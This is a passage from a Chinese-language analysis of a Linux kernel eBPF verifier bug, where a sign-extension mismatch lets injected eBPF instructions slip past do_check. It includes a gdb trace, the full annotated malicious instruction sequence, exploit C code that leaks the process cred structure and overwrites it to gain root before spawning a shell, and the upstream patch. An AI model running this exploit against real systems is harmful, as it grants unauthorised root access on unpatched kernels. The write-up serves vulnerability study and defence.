or cross-edge * 23 label t as explored * 24 S.pop() * * convention: * 0x10 - discovered * 0x11 - discovered and fall-through edge labelled * 0x12 - discovered and fall-through and branch edges labelled * 0x20 - explored */
可以看到检查的逻辑很多,这些都是为了避免攻击者注入恶意代码到内核,在这些所有检查完成之后,会调用__bpf_prog_run
函数来解码伪指令并运行,解码主要是通过一个表查找来进行的,不再展开,实现在kernel/bpf/core.c
中。
/** * __bpf_prog_run - run eBPF program on a given context * @ctx: is the data we are operating on * @insn: is the array of eBPF instructions * * Decode and execute eBPF instructions. */ static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn) { u64 stack[MAX_BPF_STACK / sizeof(u64)]; u64 regs[MAX_BPF_REG], tmp; static const void *jumptable[256] = { [0 ... 255] = &&default_label, /* Now overwrite non-defaults ... */ /* 32 bit ALU operations */ ...
漏洞主要是do_check中使用的模拟寄存器类型和实际执行函数中的寄存器类型不同,导致一些判断可以绕过do_check,执行攻击者注入的任意eBPF指令。这里以下几条伪指令为例,第0条指令将立即数0xffffffff放到r9寄存器中,第1条指令检查r9是否0xffffffff,为真则向下继续执行,跳转到L2执行到L3退出。为在do_check函数中检查到exit为一条路径的结束,因为这条表达式的计算结果恒为真,因此不会把另一条路径压入栈。
然而在__bpf_prog_run
函数中,我们使用64位类型变量存储立即数,这里的符号扩展导致比较的时候出现L1的比较失败,可以执行后面的指令。
[0]: ALU_MOV_K(0,9,0x0,0xffffffff) [1]: JMP_JNE_K(0,9,0x2,0xffffffff) [2]: ALU64_MOV_K(0,0,0x0,0x0) [3]: JMP_EXIT(0,0,0x0,0x0) [4]: ......
这里我们直接去调试exp,定位到漏洞处的比较。在启动脚本中关掉kaslr,默认的内核加载地址是0xffffffff81000000
,用add-symbol-file ./vmlinux 0xffffffff81000000
,或者看一下__bpf_prog_run
的地址直接下断点运行exp,可以看到虽然低4字节相同,但是因为movsxd
的符号扩展,rdx被扩展为0xffffffffffffffff
,从而比较失败,继续执行L4后面的指令。
/ # cat /proc/kallsyms | grep -F "__bpf_prog_run" ffffffff8116f190 t __bpf_prog_run / # ./poc
[------------------------------------------------------------------------------] Legend: code, data, rodata, value ERROR: Could not find ELF base! ERROR: Could not find ELF base! 0xffffffff8116fa83 in ?? () LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ──────────────────────────[ REGISTERS ]─────────────────────────── RAX 0x2 RBX 0xffffc9000008a030L ◂— 0xffffffff00020255 RCX 0x0 RDX 0xffffffffffffffff RDI 0xffffffff RSI 0xffffc9000008a028L ◂— 0xffffffff000002b4 R8 0x0 R9 0x0 R10 0xffff88000d632000L ◂— add byte ptr [rax], al R11 0xffff88000f7639c0L ◂— 0x0 R12 0xffffffff81a32c20L —▸ 0xffffffff81170379L ◂— 0x4881a32c00c6c748 R13 0x0 R14 0xffff88000f7639c0L ◂— 0x0 R15 0x40 RBP 0xffff88000f733cb0L —▸ 0xffff88000f733cf8L —▸ 0xffff88000f733da0L —▸ 0xffff88000f733dc0L —▸ 0xffff88000f733e38L ◂— ... RSP 0xffff88000f733a30L —▸ 0xffff88000ec1a020L ◂— add byte ptr [rax], al RIP 0xffffffff8116fa83L ◂— 0x88c59439480fe083 ────────────────────────────[ DISASM ]──────────────────────────── 0xffffffff8116f7ad mov qword ptr [rbp + rax*8 - 0x278], rdi 0xffffffff8116f7b5 movzx eax, byte ptr [rbx] 0xffffffff8116f7b8 jmp qword ptr [r12 + rax*8] ↓ 0xffffffff8116fa7b movzx eax, byte ptr [rbx + 1] 0xffffffff8116fa7f movsxd rdx, dword ptr [rbx + 4] ► 0xffffffff8116fa83 and eax, 0xf 0xffffffff8116fa86 cmp qword ptr [rbp + rax*8 - 0x278], rdx 0xffffffff8116fa8e je 0xffffffff8117053c 0xffffffff8116fa94 movsx rax, word ptr [rbx + 2] 0xffffffff8116fa99 lea rbx, qword ptr [rbx + rax*8 + 8] 0xffffffff8116fa9e movzx eax, byte ptr [rbx] ────────────────────────────[ STACK ]───────────────────────────── 00:0000│ rsp 0xffff88000f733a30L —▸ 0xffff88000ec1a020L ◂— add byte ptr [rax], al 01:0008│ 0xffff88000f733a38L ◂— 0x0 02:0010│ 0xffff88000f733a40L —▸ 0xffff88000d632000L ◂— add byte ptr [rax], al 03:0018│ 0xffff88000f733a48L ◂— 0xffffffff 04:0020│ 0xffff88000f733a50L —▸ 0xffff88000f733b20L —▸ 0xffff88000f733b38L —▸ 0xffff88000f733b88L —▸ 0xffff88000f733bc8L ◂— ... 05:0028│ 0xffff88000f733a58L —▸ 0xffffffff811e5d37L ◂— 0x102444c749 06:0030│ 0xffff88000f733a60L —▸ 0xffffffff811e4454L ◂— 0x1b808c48348 07:0038│ 0xffff88000f733a68L —▸ 0xffff88000ec1b1d0L ◂— add byte ptr [rax], al ──────────────────────────[ BACKTRACE ]─────────────────────────── ► f 0 ffffffff8116fa83 f 1 ffff88000ec1a020 f 2 0 gdb-peda$ i r rdx rdx 0xffffffffffffffff 0xffffffffffffffff gdb-peda$ x/gx $rbx+4 0xffffc9000008a034: 0x000000b7ffffffff gdb-peda$
exp的核心是eBPF指令,可以自己编写解码函数来解码,也可以通过llvm-objdump等一些工具对指令解码,这里直接搬运X3h1n师姐的解码结果分析。其中0~3指令用来绕过check。
4指令获取map地址到r9寄存器,5指令填充(因为我们需要2个4字节寄存器存储8字节地址)。
6-13
指令取出map[0]
存储到r6寄存器中。同理14-21
取出map[1]
存储到r7寄存器,22-29
取出map[2]
存储到r8寄存器。
后面的指令可以分为三个部分,由r6即map[0]的值做区分:
[0]: ALU_MOV_K(BPF_REG_9, BPF_REG_0, 0x0, 0xffffffff) [1]: JMP_JNE_K(BPF_REG_9, BPF_REG_0, 0x2, 0xffffffff) [2]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0) [3]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) [4]: LD_MAP_FD(BPF_REG_9, map_addr) [5]: bpf_map_padding [6]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0)//r1=r9 [7]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0)//r2=r10(rbp) [8]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc)//r2=r2-4 [9]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x0)//[rbp-4]=r0 [10]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem)//执行BPF_FUNC_map_lookup_elem [11]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0)//r0 != 0 [12]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//exit [13]: LDX_MEM_DW(BPF_REG_6, BPF_REG_0, 0x0, 0x0)//r6=[r0]=map[0] [14]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0) [15]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0) [16]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc) [17]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x1) [18]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem) [19]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0) [20]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) [21]: LDX_MEM_DW(BPF_REG_7, BPF_REG_0, 0x0, 0x0) [22]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0) [23]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0) [24]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc) [25]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x2) [26]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem) [27]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0) [28]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) [29]: LDX_MEM_DW(BPF_REG_8, BPF_REG_0, 0x0, 0x0) [30]: ALU64_MOV_X(BPF_REG_2, BPF_REG_0, 0x0, 0x0)//r2=r0 [31]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//r0=0 [32]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x3, 0x0)// if r6 != 0 jmp 36 [33]: LDX_MEM_DW(BPF_REG_3, BPF_REG_7, 0x0, 0x0)//r3=[r7] [34]: STX_MEM_DW(BPF_REG_2, BPF_REG_3, 0x0, 0x0)//[r2]=r3 [35]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//exit [36]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x2, 0x1)//if r6 !=1 1 jmp 39 [37]: STX_MEM_DW(BPF_REG_2, BPF_REG_10, 0x0, 0x0)//[r2]=r10=rbp [38]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//exit [39]: STX_MEM_DW(BPF_REG_7, BPF_REG_8, 0x0, 0x0)//[r7]=r8 [40]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//exit
最终的漏洞利用步骤如下:
mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0); if (mapfd < 0) { fail("failed to create bpf map: '%s'\n", strerror(errno)); } redact("sneaking evil bpf past the verifier\n"); progfd = load_prog(); if (progfd < 0) { if (errno == EACCES) { msg("log:\n%s", bpf_log_buf); } fail("failed to load prog '%s'\n", strerror(errno)); } redact("creating socketpair()\n"); if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) { fail("failed to create socket pair '%s'\n", strerror(errno)); } redact("attaching bpf backdoor to socket\n"); if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) { fail("setsockopt '%s'\n", strerror(errno)); }
thread_info
结构体中的task_struct
,而是通过泄露socket地址从另一个结构体变量中找到cred。在经典版本中,用的是泄露内核栈地址addr,然后用addr & ~(0x400-1)
来找thread_info进而找cred。这个原理是内核栈和thread_info位置相邻,地址有对应关系。id_t uid = getuid(); unsigned long skbuff = get_skbuff(); unsigned long sock_addr = read64(skbuff + 24); msg("skbuff => %llx\n", skbuff); msg("Leaking sock struct from %llx\n", sock_addr); if(sock_addr < PHYS_OFFSET){ fail("Failed to find Sock address from sk_buff.\n"); } /* * scan forward for expected sk_rcvtimeo value. * * struct sock { * [...] * const struct cred *sk_peer_cred; * long sk_rcvtimeo; * }; */ for (int i = 0; i < 100; i++, sock_addr += 8) { if(read64(sock_addr) == 0x7FFFFFFFFFFFFFFF) { unsigned long cred_struct = read64(sock_addr - 8); if(cred_struct < PHYS_OFFSET) { continue; } unsigned long test_uid = (read64(cred_struct + 8) & 0xFFFFFFFF); if(test_uid != uid) { continue; } msg("Sock->sk_rcvtimeo at offset %d\n", i * 8); msg("Cred structure at %llx\n", cred_struct); msg("UID from cred structure: %d, matches the current: %d\n", test_uid, uid); return cred_struct; } }
static void hammer_cred(unsigned long addr) { msg("hammering cred structure at %llx\n", addr); #define w64(w) { write64(addr, (w)); addr += 8; } unsigned long val = read64(addr) & 0xFFFFFFFFUL; w64(val); w64(0); w64(0); w64(0); w64(0); w64(0xFFFFFFFFFFFFFFFF); w64(0xFFFFFFFFFFFFFFFF); w64(0xFFFFFFFFFFFFFFFF); #undef w64 } // main(){ //... if(execl("/bin/sh", "/bin/sh", NULL)) { fail("exec %s\n", strerror(errno)); } //... }
漏洞的patch如下kernel/git/torvalds/linux.git
这里在do_check里添加了对于BPF_ALU64
指令的判断,从而将64和32的比较区分开来,使得预先check和实际run code的检查环境一致,该漏洞无法再被利用。
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c index 625e358ca765..c086010ae51e 100644 --- a/kernel/bpf/verifier.c +++ b/kernel/bpf/verifier.c @@ -2408,7 +2408,13 @@ static int check_alu_op(struct bpf_verifier_env *env, struct bpf_insn *insn) * remember the value we stored into this reg */ regs[insn->dst_reg].type = SCALAR_VALUE; - __mark_reg_known(regs + insn->dst_reg, insn->imm); + if (BPF_CLASS(insn->code) == BPF_ALU64) { + __mark_reg_known(regs + insn->dst_reg, + insn->imm); + } else { + __mark_reg_known(regs + insn->dst_reg, + (u32)insn->imm); + } } } else if (opcode > BPF_END) {